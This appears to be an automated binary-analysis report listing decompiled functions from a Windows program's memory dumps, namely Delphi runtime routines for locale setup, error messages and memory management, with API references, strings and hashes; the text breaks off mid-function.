Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: ff68f8bc8c37020399e68e1f56bafd439613cb074afb5eacf4222545351c9975
Instruction ID: 8956addf40242155cfdb2216673929f7d9524eb236bbacd825fdfe017c78867f
Opcode Fuzzy Hash: ff68f8bc8c37020399e68e1f56bafd439613cb074afb5eacf4222545351c9975
Instruction Fuzzy Hash: 6D212330604209ABEB10EAA5CC52BDEB7A9EF44304F61447BA500F76D1EB7C9E4587DC

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5A8, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 203
threadCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040A5A8(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t135;
				intOrPtr _t187;
				intOrPtr _t197;
				intOrPtr _t198;

				_t195 = __esi;
				_t194 = __edi;
				_t197 = _t198;
				_t135 = 8;
				do {
					_push(0);
					_push(0);
					_t135 = _t135 - 1;
				} while (_t135 != 0);
				_push(__ebx);
				_push(_t197);
				_push(0x40a886);
				_push( *[fs:eax]);
				 *[fs:eax] = _t198;
				E0040A4F0();
				E00408F68(__ebx, __edi, __esi);
				_t200 =  *0x415c3c;
				if( *0x415c3c != 0) {
					E00409140(__esi, _t200);
				}
				_t134 = GetThreadLocale();
				E00408EB4(_t43, 0, 0x14,  &_v20);
				E00404C98(0x415b6c, _v20);
				E00408EB4(_t43, 0x40a8a0, 0x1b,  &_v24);
				 *0x415b70 = E00407F10(0x40a8a0, 0, _t200);
				E00408EB4(_t134, 0x40a8a0, 0x1c,  &_v28);
				 *0x415b71 = E00407F10(0x40a8a0, 0, _t200);
				 *0x415b72 = E00408F00(_t134, 0x2c, 0xf);
				 *0x415b74 = E00408F00(_t134, 0x2e, 0xe);
				E00408EB4(_t134, 0x40a8a0, 0x19,  &_v32);
				 *0x415b76 = E00407F10(0x40a8a0, 0, _t200);
				 *0x415b78 = E00408F00(_t134, 0x2f, 0x1d);
				E00408EB4(_t134, L"m/d/yy", 0x1f,  &_v40);
				E004091F4(_v40, _t134,  &_v36, _t194, _t195, _t200);
				E00404C98(0x415b7c, _v36);
				E00408EB4(_t134, L"mmmm d, yyyy", 0x20,  &_v48);
				E004091F4(_v48, _t134,  &_v44, _t194, _t195, _t200);
				E00404C98(0x415b80, _v44);
				 *0x415b84 = E00408F00(_t134, 0x3a, 0x1e);
				E00408EB4(_t134, 0x40a8f4, 0x28,  &_v52);
				E00404C98(0x415b88, _v52);
				E00408EB4(_t134, 0x40a908, 0x29,  &_v56);
				E00404C98(0x415b8c, _v56);
				E00404CEC( &_v12, 0);
				E00404CEC( &_v16, 0);
				E00408EB4(_t134, 0x40a8a0, 0x25,  &_v60);
				_t104 = E00407F10(0x40a8a0, 0, _t200);
				_t201 = _t104;
				if(_t104 != 0) {
					E00404CEC( &_v8, 0x40a92c);
				} else {
					E00404CEC( &_v8, 0x40a91c);
				}
				E00408EB4(_t134, 0x40a8a0, 0x23,  &_v64);
				_t111 = E00407F10(0x40a8a0, 0, _t201);
				_t202 = _t111;
				if(_t111 == 0) {
					E00408EB4(_t134, 0x40a8a0, 0x1005,  &_v68);
					if(E00407F10(0x40a8a0, 0, _t202) != 0) {
						E00404CEC( &_v12, L"AMPM ");
					} else {
						E00404CEC( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E0040513C(0x415b90, 4, _t194);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E0040513C(0x415b94, 4, _t194);
				 *0x415c3e = E00408F00(_t134, 0x2c, 0xc);
				_pop(_t187);
				 *[fs:eax] = _t187;
				_push(E0040A88D);
				return L00404C90( &_v68, 0x10);
			}

0x0040a5a8
0x0040a5a8
0x0040a5a9
0x0040a5ab
0x0040a5b0
0x0040a5b0
0x0040a5b2
0x0040a5b4
0x0040a5b4
0x0040a5b7
0x0040a5ba
0x0040a5bb
0x0040a5c0
0x0040a5c3
0x0040a5c6
0x0040a5cb
0x0040a5d0
0x0040a5d7
0x0040a5d9
0x0040a5d9
0x0040a5e3
0x0040a5f2
0x0040a5ff
0x0040a614
0x0040a623
0x0040a638
0x0040a647
0x0040a65c
0x0040a672
0x0040a688
0x0040a697
0x0040a6ac
0x0040a6c2
0x0040a6cd
0x0040a6da
0x0040a6ef
0x0040a6fa
0x0040a707
0x0040a71c
0x0040a732
0x0040a73f
0x0040a754
0x0040a761
0x0040a76b
0x0040a775
0x0040a78a
0x0040a794
0x0040a799
0x0040a79b
0x0040a7b4
0x0040a79d
0x0040a7a5
0x0040a7a5
0x0040a7c9
0x0040a7d3
0x0040a7d8
0x0040a7da
0x0040a7ec
0x0040a7fd
0x0040a816
0x0040a7ff
0x0040a807
0x0040a807
0x0040a7fd
0x0040a81b
0x0040a81e
0x0040a821
0x0040a826
0x0040a833
0x0040a838
0x0040a83b
0x0040a83e
0x0040a843
0x0040a850
0x0040a865
0x0040a86d
0x0040a870
0x0040a873
0x0040a885

APIs

GetThreadLocale.KERNEL32(00000000,0040A886,?,?,00000000,00000000), ref: 0040A5DE

Part of subcall function 00408EB4: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00408ED2

Strings

AMPM , xrefs: 0040A811
:mm, xrefs: 0040A821
AMPM, xrefs: 0040A802
mmmm d, yyyy, xrefs: 0040A6E3
:mm:ss, xrefs: 0040A83E
m/d/yy, xrefs: 0040A6B6

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 8a50f68389ff190409cc6e1354995ac59f3095b9dfab6b774593af29b2008bc8
Instruction ID: 937fad03d119ad446409e4fc6370febcefa1a0408b23a60a3ce11da87fe3f1e8
Opcode Fuzzy Hash: 8a50f68389ff190409cc6e1354995ac59f3095b9dfab6b774593af29b2008bc8
Instruction Fuzzy Hash: 01710A75B042499BDB00EBA5D841ADF7266ABC8308F51D43BB201BB3C6DA3CDD16879D

Uniqueness

Uniqueness Score: -1.00%

Function 004044F0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004044F0(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x41304c == 0) {
					if( *0x412028 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x413328 == 0xd7b2 &&  *0x413330 > 0) {
						 *0x413340();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E0040457C, 2,  &_v4, 0);
				}
			}

0x004044f8
0x00404558
0x00404568
0x00404568
0x0040456e
0x004044fa
0x00404503
0x00404513
0x00404513
0x0040452f
0x00404550
0x00404550

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?), ref: 00404529
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000), ref: 0040452F
GetStdHandle.KERNEL32(000000F5,0040457C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?), ref: 00404544
WriteFile.KERNEL32(00000000,000000F5,0040457C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?), ref: 0040454A
MessageBoxA.USER32 ref: 00404568

Strings

Runtime error at 00000000, xrefs: 00404522, 00404561
Error, xrefs: 0040455C

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 702207360e6f67392dae8c09e50a71dce199e074f7270a58720f1a5ddd4bdc6b
Instruction ID: fdc5a69791f8b721a84368f61c8a4f4698a1174428d9f6e56fc121f1a8fce5d1
Opcode Fuzzy Hash: 702207360e6f67392dae8c09e50a71dce199e074f7270a58720f1a5ddd4bdc6b
Instruction Fuzzy Hash: 8CF02BF0A8038479E620B7609D06FD626880384F1AFA0823BB370F54E6C6FC45C4C62D

Uniqueness

Uniqueness Score: -1.00%

Function 00401E74, Relevance: 10.9, APIs: 7, Instructions: 407
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00401E74(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t180;
				intOrPtr _t193;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				void* _t206;
				unsigned int _t208;
				intOrPtr _t214;
				void* _t226;
				intOrPtr _t228;
				void* _t229;
				signed int _t231;
				void* _t233;
				signed int _t234;
				signed int _t235;
				signed int _t239;
				signed int _t242;
				void* _t244;
				intOrPtr* _t245;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t218 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t218);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t226);
							_t245 = _t244 + 0xffffffe0;
							_t219 = __edx;
							_t203 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (_t69 & 0xfffffff0) - 0x14;
							if(_t148 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E004018F8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t219 - 0x40a2c;
										if(_t219 > 0x40a2c) {
											_t78 = _t203 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t219;
										}
										E004014BC(_t203, _t219, _t150);
										E00401C7C(_t203, _t203, _t226);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								_t180 = (_t148 >> 2) + _t148;
								if(_t180 <= __edx) {
									_t228 = __edx;
								} else {
									_t228 = _t180;
								}
								 *_t245 = _t203 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t245 + 8), _t245 + 8, 0x1c);
								if( *((intOrPtr*)(_t245 + 0x14)) != 0x10000) {
									L12:
									_t150 = E004018F8(_t228);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t228 - 0x40a2c;
										if(_t228 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t219;
										}
										E0040148C(_t203,  *((intOrPtr*)(_t203 - 0x10 + 8)), _t150);
										E00401C7C(_t203, _t203, _t228);
									}
								} else {
									 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0xffff0000;
									_t94 =  *(_t245 + 0x10);
									if(_t219 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t228 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t245 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t245 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t203 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t219;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t203;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t206 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t226);
						if(__edx > _t171) {
							_t102 =  *(_t206 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t229 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t208 = _t171;
								_t109 = E004018F8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t193 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t229 - 0x40a2c;
									if(_t229 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t193;
									}
									_t231 = _t109;
									E0040148C(_t218, _t208, _t109);
									E00401C7C(_t218, _t208, _t231);
									return _t231;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t233 = _t171 + _t115;
								__eflags = __edx - _t233;
								if(__edx > _t233) {
									goto L75;
								} else {
									__eflags =  *0x41304d;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E004014D8(_t206);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t196 = _t233 + 4 - _t123;
										__eflags = _t196;
										if(_t196 > 0) {
											 *(_t218 + _t233 - 4) = _t196;
											 *((intOrPtr*)(_t218 - 4 + _t123)) = _t196 + 3;
											_t234 = _t123;
											__eflags = _t196 - 0xb30;
											if(_t196 >= 0xb30) {
												__eflags = _t123 + _t218;
												E00401518(_t123 + _t218, _t171, _t196);
											}
										} else {
											 *(_t218 + _t233) =  *(_t218 + _t233) & 0xfffffff7;
											_t234 = _t233 + 4;
										}
										_t235 = _t234 | _t156;
										__eflags = _t235;
										 *(_t218 - 4) = _t235;
										 *0x413a34 = 0;
										_t109 = _t218;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x413a34], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4138d5;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x413a34], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t218 - 4);
										_t129 =  *(_t206 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x413a34 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t233 = _t171 + _t115;
											__eflags = _t176 - _t233;
											if(_t176 > _t233) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t239 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t239;
									__eflags =  *0x41304d;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x413a34], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4138d5;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x413a34], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t218 - 4);
										__eflags = 0xf;
									}
									 *(_t218 - 4) = _t156 | _t239;
									_t161 = _t174;
									_t197 =  *(_t206 - 4);
									__eflags = _t197 & 0x00000001;
									if((_t197 & 0x00000001) != 0) {
										_t131 = _t206;
										_t198 = _t197 & 0xfffffff0;
										_t161 = _t161 + _t198;
										_t206 = _t206 + _t198;
										__eflags = _t198 - 0xb30;
										if(_t198 >= 0xb30) {
											E004014D8(_t131);
										}
									} else {
										 *(_t206 - 4) = _t197 | 0x00000008;
									}
									 *((intOrPtr*)(_t206 - 8)) = _t161;
									 *((intOrPtr*)(_t218 + _t239 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00401518(_t218 + _t239, _t174, _t161);
									}
									 *0x413a34 = 0;
									return _t218;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t214 = __edx;
										_t140 = E004018F8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t242 = _t140;
											E004014BC(_t218, _t214, _t140);
											E00401C7C(_t218, _t214, _t242);
											_t140 = _t242;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E004018F8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E00401C7C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E004018F8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E00401C7C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x00401e74
0x00401e74
0x00401e74
0x00401e7c
0x00401e7e
0x00401f0c
0x00401f0f
0x0040217c
0x0040217d
0x0040217e
0x00402181
0x004017ac
0x004017ad
0x004017ae
0x004017af
0x004017b0
0x004017b3
0x004017b5
0x004017bc
0x004017c3
0x004017c8
0x004018b1
0x004018b3
0x004018c6
0x004018c8
0x004018ca
0x004018cc
0x004018d2
0x004018d6
0x004018d6
0x004018d9
0x004018d9
0x004018e2
0x004018e9
0x004018e9
0x004018b5
0x004018b5
0x004018ba
0x004018ba
0x004017ce
0x004017d3
0x004017d7
0x004017dd
0x004017d9
0x004017d9
0x004017d9
0x004017e9
0x004017f8
0x00401805
0x00401877
0x0040187e
0x00401880
0x00401882
0x00401884
0x0040188a
0x0040188e
0x0040188e
0x00401891
0x00401891
0x004018a1
0x004018a8
0x004018a8
0x00401807
0x00401807
0x00401813
0x00401819
0x00000000
0x0040181b
0x0040182c
0x00401830
0x00401832
0x00401832
0x00401848
0x00000000
0x00401860
0x00401862
0x00401865
0x00401870
0x00401873
0x00401873
0x00401848
0x00401819
0x00401805
0x004018f7
0x00402187
0x00402187
0x00402189
0x00402189
0x00401f15
0x00401f17
0x00401f1a
0x00401f1b
0x00401f1e
0x00401f21
0x00401f24
0x00401f26
0x00401f27
0x0040203c
0x0040203f
0x00402041
0x00402134
0x0040213f
0x00402146
0x00402148
0x0040214b
0x00402150
0x00402151
0x00402153
0x00000000
0x00402155
0x00402155
0x0040215b
0x0040215d
0x0040215d
0x00402160
0x00402168
0x0040216f
0x0040217a
0x0040217a
0x00402047
0x00402047
0x0040204a
0x0040204d
0x0040204f
0x00000000
0x00402055
0x00402055
0x0040205c
0x004020b9
0x004020b9
0x004020be
0x004020c4
0x004020c9
0x004020ca
0x004020ca
0x004020d6
0x004020e7
0x004020ed
0x004020ed
0x004020ef
0x004020fc
0x00402103
0x00402107
0x00402109
0x0040210f
0x00402111
0x00402113
0x00402113
0x004020f1
0x004020f1
0x004020f5
0x004020f5
0x00402118
0x00402118
0x0040211a
0x0040211d
0x00402124
0x00402126
0x0040212a
0x0040205e
0x0040205e
0x00402063
0x0040206b
0x00000000
0x00000000
0x0040206d
0x0040206f
0x00402076
0x00000000
0x00402078
0x0040207c
0x00402081
0x00402082
0x00402088
0x00402090
0x00402096
0x0040209b
0x0040209c
0x00000000
0x0040209c
0x00402090
0x00000000
0x00402076
0x004020a5
0x004020a8
0x004020ab
0x004020ad
0x0040212d
0x0040212d
0x00000000
0x004020af
0x004020af
0x004020b2
0x004020b5
0x004020b7
0x00000000
0x00000000
0x00000000
0x00000000
0x004020b7
0x004020ad
0x0040205c
0x0040204f
0x00401f2d
0x00401f30
0x00401f32
0x00401f3c
0x00401f42
0x00401f59
0x00401f59
0x00401f65
0x00401f6b
0x00401f6d
0x00401f74
0x00401f76
0x00401f7b
0x00401f83
0x00000000
0x00000000
0x00401f85
0x00401f87
0x00401f8e
0x00000000
0x00401f90
0x00401f93
0x00401f98
0x00401f9e
0x00401fa6
0x00401fab
0x00401fb0
0x00000000
0x00401fb0
0x00401fa6
0x00000000
0x00401f8e
0x00401fb9
0x00401fb9
0x00401fb9
0x00401fbe
0x00401fc1
0x00401fc3
0x00401fc6
0x00401fc9
0x00401fd4
0x00401fd6
0x00401fd9
0x00401fdb
0x00401fdd
0x00401fe3
0x00401fe5
0x00401fe5
0x00401fcb
0x00401fce
0x00401fce
0x00401fea
0x00401ff0
0x00401ff4
0x00401ffa
0x00402001
0x00402001
0x00402006
0x00402013
0x00401f44
0x00401f44
0x00401f4a
0x00402014
0x00402018
0x0040201d
0x0040201f
0x00402021
0x00402029
0x00402030
0x00402035
0x00402035
0x0040203b
0x00401f50
0x00401f50
0x00401f55
0x00401f57
0x00000000
0x00000000
0x00000000
0x00000000
0x00401f57
0x00401f4a
0x00401f34
0x00401f34
0x00401f38
0x00401f38
0x00401f32
0x00401f27
0x00401e84
0x00401e84
0x00401e86
0x00401e8a
0x00401e8d
0x00401e8f
0x00401ec8
0x00401ecc
0x00401ecd
0x00401ecf
0x00401ed1
0x00401ed3
0x00401ed6
0x00401ed8
0x00401eda
0x00401edf
0x00401ee1
0x00401ee3
0x00401ee9
0x00401eeb
0x00401eeb
0x00401ef2
0x00401ef2
0x00401ef5
0x00401ef7
0x00401f00
0x00401f05
0x00401f05
0x00401f07
0x00401f08
0x00401f09
0x00401f0a
0x00401e91
0x00401e91
0x00401e98
0x00401e9a
0x00401ea0
0x00401ea2
0x00401ea4
0x00401ea9
0x00401eab
0x00401ead
0x00401eaf
0x00401eb1
0x00401ebc
0x00401ec1
0x00401ec1
0x00401ec3
0x00401ec4
0x00401ec5
0x00401e9c
0x00401e9c
0x00401e9d
0x00401e9e
0x00401e9e
0x00401e9a
0x00401e8f

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f575fe0f9ab75cd77064c69f6d0118a98c1029f4734138360c475f3ddc3b2d0
Instruction ID: e7aaafa73fe3aa34f17de89ed5c93537a6fc3e5f890846df0dd0d21288fe1d67
Opcode Fuzzy Hash: 5f575fe0f9ab75cd77064c69f6d0118a98c1029f4734138360c475f3ddc3b2d0
Instruction Fuzzy Hash: 54C102767002010BE714AA6DDD8976EB2C69BC5325F18823FE214EB3E6DABCC9458348

Uniqueness

Uniqueness Score: -1.00%

Function 004027B8, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 277
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004027B8(void* __eax, void* __fp0) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				signed short* _v112676;
				void* _v112680;
				char _v129064;
				char _v131113;
				char _v161832;
				void* _t70;
				int _t76;
				intOrPtr _t79;
				intOrPtr _t90;
				CHAR* _t94;
				intOrPtr _t96;
				void* _t106;
				intOrPtr _t107;
				intOrPtr _t113;
				intOrPtr _t118;
				void* _t128;
				intOrPtr _t129;
				intOrPtr _t133;
				signed int _t143;
				int _t148;
				intOrPtr _t149;
				char* _t151;
				char* _t152;
				char* _t153;
				char* _t154;
				char* _t155;
				char* _t156;
				char* _t158;
				char* _t159;
				char* _t164;
				char* _t165;
				intOrPtr _t197;
				void* _t199;
				void* _t200;
				intOrPtr* _t203;
				void* _t205;
				void* _t206;
				signed int _t211;
				void* _t214;
				void* _t215;
				void* _t228;

				_push(__eax);
				_t70 = 0x27;
				goto L1;
				L12:
				while(_t197 != 0x413a24) {
					_t76 = E004021E4(_t197);
					_t148 = _t76;
					__eflags = _t148;
					if(_t148 == 0) {
						L11:
						_t20 = _t197 + 4; // 0x413a24
						_t197 =  *_t20;
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						_t211 =  *(_t148 - 4);
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							__eflags = _t211 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t211 & 0xfffffff0) - 4;
									_t143 = E004025A0(_t148);
									__eflags = _t143;
									if(_t143 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t214 + _v112652 * 4 - 0x1f824)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E004025F8(_t148, __eflags, _t214);
							}
						}
						_t76 = E004021C0(_t148);
						_t148 = _t76;
						__eflags = _t148;
					} while (_t148 != 0);
					goto L11;
				}
				_t149 =  *0x415acc; // 0x415ac8
				while(_t149 != 0x415ac8 && _v112652 < 0x1000) {
					_t76 = E004025A0(_t149 + 0x10);
					__eflags = _t76;
					if(_t76 == 0) {
						_v112645 = 0;
						_t22 = _t149 + 0xc; // 0x0
						_t76 = _v112652;
						 *((intOrPtr*)(_t214 + _t76 * 4 - 0x1f824)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t29 = _t149 + 4; // 0x415ac8
					_t149 =  *_t29;
				}
				if(_v112645 != 0) {
					L50:
					return _t76;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t79 =  *0x412038; // 0x40126c
				_t151 = E0040237C(E00404914(_t79),  &_v161832);
				_v112660 = 0x37;
				_v112676 = 0x41205e;
				_v112680 =  &_v110600;
				do {
					_v112672 = ( *_v112676 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t199 = 0xff;
					_t203 = _v112680;
